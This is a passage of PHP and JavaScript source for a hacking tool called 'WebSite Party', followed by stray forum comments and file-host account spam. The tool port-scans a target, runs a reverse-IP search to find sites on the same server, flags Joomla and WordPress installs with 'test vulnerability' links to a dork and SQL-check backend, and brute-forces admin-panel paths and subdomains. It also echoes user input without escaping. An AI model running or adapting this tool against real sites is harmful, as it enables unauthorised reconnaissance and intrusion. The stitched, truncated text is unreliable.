            if(btext.value == 'Search') nomer = 1;
            var target = document.getElementById('dork');
            var setype = document.getElementById('setype');
            if(target.value.trim().length>0) {
                document.getElementById("loading").style.visibility = 'visible';
                document.getElementById("btnOk").value = "Pause";
                target.readOnly = true;
                setype.disabled = true;
                jalan = true;
                sqlCheck('dork=' + encodeURIComponent(target.value) + '&setype=' + encodeURIComponent(setype.value));
            }
        }
        else alert("Please stop first...");
    }
    else {
        berhenti();
    }
}
function initpg(){
    document.onkeypress = keyHandler;
}
function berhenti(){
    jalan = false;
}
function bersih(){
    var tanya = confirm("Clear results and restart?");
    if(tanya == true) location.href = 'adm.php';
}
function checkheavy_fix(){
    var heavyval = document.getElementById("heavy");
    if(heavyval.checked) heavyval.checked = false;
    else heavyval.checked = true;
    checkheavy();
}
function checkheavy(){
    var heavyval = document.getElementById("heavy").checked;
    var box = document.getElementById("result")
    if(heavyval) {
        heavy = true;
        box.innerHTML += '<span class=\"red\">*** </span> depth scan...<br />';
    }
    else {
        heavy = false;
        box.innerHTML += '<span class=\"red\">*** </span> quick scan...<br />';
    }
}
</script>
<?php
    echo '
</head>
<body>
<br />
<br />
<h1 class="technique-two"> </h1>
<div class="wrapper">
<table><tr><td>
<div class="red">
<div class="tube">
<table width=100% style="background: #222; border: 1px solid #111;"><tr><td align=left><table><tr><td><img src="http://cdn4.iconfinder.com/data/icons/socialmediaicons_v120/32/website.png"></td><td><center><b>WebSite Party</b></center></td></table></table><br>
<form action="" method="post" name="xploit_form">
URL:<br /><input type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 100%;" /><br /><br />
404 error page:<br /><input type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 100%;" /><br /><br />
<span style="float: right;"><table><tr><td>Verified: <span id="verified">0</span> / <span id="total">0</span></td><td><input type="submit" name="xploit_submit" value="Search !" align="right" /></td></tr><tr><td><br>Stalk3R@live.CoM www.sec4ever.com</td></tr></table></span>
</form><br>
';
?>
</div>
<?php
    echo '
<br>
</div> <!-- /tube -->
</div> <!-- /red -->
</td><td valign=top>
';
    if($_POST['xploit_submit']) {
        echo '
<div class="green">
<div class="tube" id="rightcol">';
        echo '
Infos about website:<br>
*******************/<br>
<table width=100% style="background: #222; border: 1px solid #111;">
<td>
<img src="http://open.thumbshots.org/image.pxf?url='.$_POST['xploit_url'].'">
</td>
<td>
<textarea style="width:100%;height:88px;background:#555;margin-left:-15px">If ROBOTS.TXT exist,you see it here ';
        $url_robots = str_replace("http://", "", $_POST['xploit_url']);
        $robots = 'http://'.$url_robots.'/robots.txt';
        $affiche_robots = file_get_contents($robots);
        echo $affiche_robots;
        echo '</textarea></td></tr></table>
<br>
Ports scanner:<br>
*************/
<div class="tube" id="portbox">
<table width=100% style="background: #222; border: 1px solid #111;"><tr><td>
';
        // Port scanner
        $port = array("21", "23", "25", "80", "110", "139", "445", "1433", "1521", "1723", "3306", "3389", "5900", "8080");
        $port_name = array("(FTP)", "(TELNET)", "(SMTP)", "(HTTP)", "(POP3)", "(NETBIOS-SSN)", "(MICROSOFT-DS)", "(MS-SQL-S)", "(NCUBE-LM)", "(PPTP)", "(MYSQL)", "(MS-WBT-SERVER)", "()", "(WEBCACHE)");
        $site = $_POST['xploit_url'];
        $site = str_replace("http://", "", $site);
        $ip_target = gethostbyname("".$site."");
        for($i=0;$i<12;$i++) {
            $fp = fsockopen($ip_target,$port[$i],$errno,$errstr,0.1);
            if($fp) {
                echo "<font color=#ff0000>". $port_name[$i] ."</font> port " . $port[$i] . " <b>OPEN</b> on " . $ip_target . "<br>";
                fclose($fp);
            }
            else {
                echo "<font color=#ff0000>". $port_name[$i] ."</font> port " . $port[$i] . " <b>CLOSED</b> on " . $ip_target . "<br>";
            }
            flush();
        }
        //-------------------------------------------
        echo '
</td></table></div>
';
        echo '
Found ones:<br />
***********/<br>';
        echo '
</div> <!-- /tube -->
</div> <!-- /green -->
</td></tr></table>
<div class="yellow">
';
        echo '
Websites on the server:<br>
*********************/<br>
';
        if($_POST['xploit_submit']) {
            $dorkk = "ip:".$ip_target;
            $pageNum = 0;
            for($pageNum = 0; $pageNum < 10; $pageNum++) {
                $bing = file_get_contents("http://www.bing.com/search?q=".str_replace(" ","+",$dorkk)."&go=&filt=all&first=".$pageNum."");
                if(!preg_match("/No results found for/",$bing)) {
                    preg_match_all("/<h3><a href=\"(.*?)\">/",$bing,$sites);
                    if(count($sites[1])==0) {return false;}
                    for($i=0 ; $i < count($sites[1]);$i++) {
                        $site2 = str_replace(array("http://","https://","www."),"",$sites[1][$i]);
                        $site2 = substr($site2,0,strpos($site2,"/",0));;
                        if(!in_array($site2,$arrayy)) {
                            //Search for JOOMLA & WORDPRESS
                            $headers_joomla = @get_headers("http://".$site2."/administrator");
                            $headers_wordpress = @get_headers("http://".$site2."/wp-admin");
                            if(strpos($headers_joomla[0],'404') === false) {
                                $joomla = "joomla";
                                $site3 = $site2." (JOOMLA) | <a href='#' class='testvuln".$joomla.''.$i."'>TEST VULNERABILITY</a>";
                                echo $site3. "<br>";
?>
<script>
//commentaudio
$('.testvuln<?php echo $joomla.''.$i;?>').live("click",function() {
    $('#showtest<?php echo $joomla.''.$i;?>').html('<p><center><img src="http://www.vojnilo.com/images/load.png" /></center></p>');
    $('#showtest<?php echo $joomla.''.$i;?>').load("adm.php?webvuln=<?php echo $site2;?>&what=<?php echo $joomla; ?>");
    return false;
});
</script>
<div id="showtest<?php echo $joomla.''.$i;?>">
<p> </p>
</div>
<?php
                            }
                            elseif(strpos($headers_wordpress[0],'404') === false) {
                                $wordpress = "wordpress";
                                $site3 = $site2." (WORDPRESS) | <a href='#' class='testvuln".$wordpress.''.$i."'>TEST VULNERABILITY</a>";
                                echo $site3. "<br>";
?>
<script>
//commentaudio
$('.testvuln<?php echo $wordpress.''.$i;?>').live("click",function() {
    $('#showtest<?php echo $wordpress.''.$i;?>').html('<p><center><img src="http://www.vojnilo.com/images/load.png" /></center></p>');
    $('#showtest<?php echo $wordpress.''.$i;?>').load("adm.php?webvuln=<?php echo $site2;?>&what=<?php echo $wordpress; ?>");
    return false;
});
</script>
<div id="showtest<?php echo $wordpress.''.$i;?>">
<p> </p>
</div>
<?php
                            }
                            else {
                                echo $site2. " | <a href='#' class='testvuln".$i."'>TEST VULNERABILITY</a><br>";
                                $site4 = str_replace("www.", "", $site2);
                                $site4 = str_replace("http://", "", $site2);
?>
<script>
$('.testvuln<?php echo $i;?>').live("click",function() {
    $('#showtest<?php echo "1".$i;?>').html('<p><center><img src="http://www.vojnilo.com/images/load.png" /></center></p>');
    $('#showtest<?php echo "1".$i;?>').load("adm.php?dork=<?php echo $site4;?>&setype=bing&page=1");
    $('#showtest<?php echo "2".$i;?>').load("adm.php?dork=<?php echo $site4;?>&setype=google&page=1");
    return false;
});
</script>
<div id="showtest<?php echo "1".$i;?>">
<p> </p>
</div>
<div id="showtest<?php echo "2".$i;?>">
<p> </p>
</div>
<?php
                            }
                            array_push($arrayy,$site2);
                        }
                    }
                    $pageNum += 10;
                }
            }
            //$array = array_unique($uSites);
            //for($i=0;$i<count($array);$i++){echo $array[$i]."<br />";}
        }
        echo '
</div>
<br clear="all" /><br />
<div class="blue">
<div class="tube" id="logbox">';
        echo '
Admin page Finder: <br />
******************/<br />
</div> <!-- /tube -->
</div> <!-- /blue -->
</div> <!-- /wrapper -->
<br clear="all">';
    }
}
function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) {
    if($br == 1) $msg .= "<br />";
    echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>";
    if($stop == 1) exit;
    @flush();@ob_flush();
}
function showport($site, $port) {
    if($br == 1) $msg .= "<br />";
    echo "<script type=\"text/javascript\">insertcode('".$site."', '".$port."');</script>";
    if($stop == 1) exit;
    @flush();@ob_flush();
}
function check($x, $front=0) {
    global $_POST,$site,$false;
    if($front == 0) $t = $site.$x;
    else $t = 'http://'.$x.'.'.$site.'/';
    $headers = get_headers($t);
    if (!eregi('200', $headers[0])) return 0;
    $data = @file_get_contents($t);
    if($_POST['xploit_404string'] == "") if($data == $false) return 0;
    if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0;
    return 1;
}
// ---------------------------------------------------------------------------
template();
if(!isset($_POST['xploit_url'])) die;
if($_POST['xploit_url'] == '') die;
$site = $_POST['xploit_url'];
$site = str_replace("http://", "", $site);
$site = "http://".$site;
if ($site[strlen($site)-1] != "/") $site .= "/";
if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
$list['end'] = str_replace("\r", "", $list['end']);
$list['front'] = str_replace("\r", "", $list['front']);
$pathes = explode("\n", $list['end']);
$frontpathes = explode("\n", $list['front']);
show(count($pathes)+count($frontpathes), 1, 0, 'total', 1);
$verificate = 0;
foreach($pathes as $path) {
    show('Checking '.$site.$path.' : ', 0, 0, 'logbox', 0);
    $verificate++;
    show($verificate, 0, 0, 'verified', 1);
    if(check($path) == 0) show('not found', 1, 0, 'logbox', 0);
    else{
        show('<span style="color: #00FF00;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
        show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0);
    }
}
preg_match("/\/\/(.*?)\//i", $site, $xx);
$site = $xx[1];
if(substr($site, 0, 3) == "www") $site = substr($site, 4);
foreach($frontpathes as $frontpath) {
    show('Checking http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0);
    $verificate++;
    show($verificate, 0, 0, 'verified', 1);
    if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0);
    else{
        show('<span style="color: #00FF00;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
        show('<a href="http://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0);
    }
}
}
?>
  23. D3vtn, be more careful before you post.. Do you want to be spoon-fed?
  24. Aelius, you have the heart of a thug and the speech of a priest!
  25. Uploadbaz.com ((Expiration: 07/April/2014)) ----------------------- Rapidgator ------------------------ ((ryushare.com)): 1 year ---------------------- To be continued, more to follow... ----------------- Rapidgator.net Account Premium 2014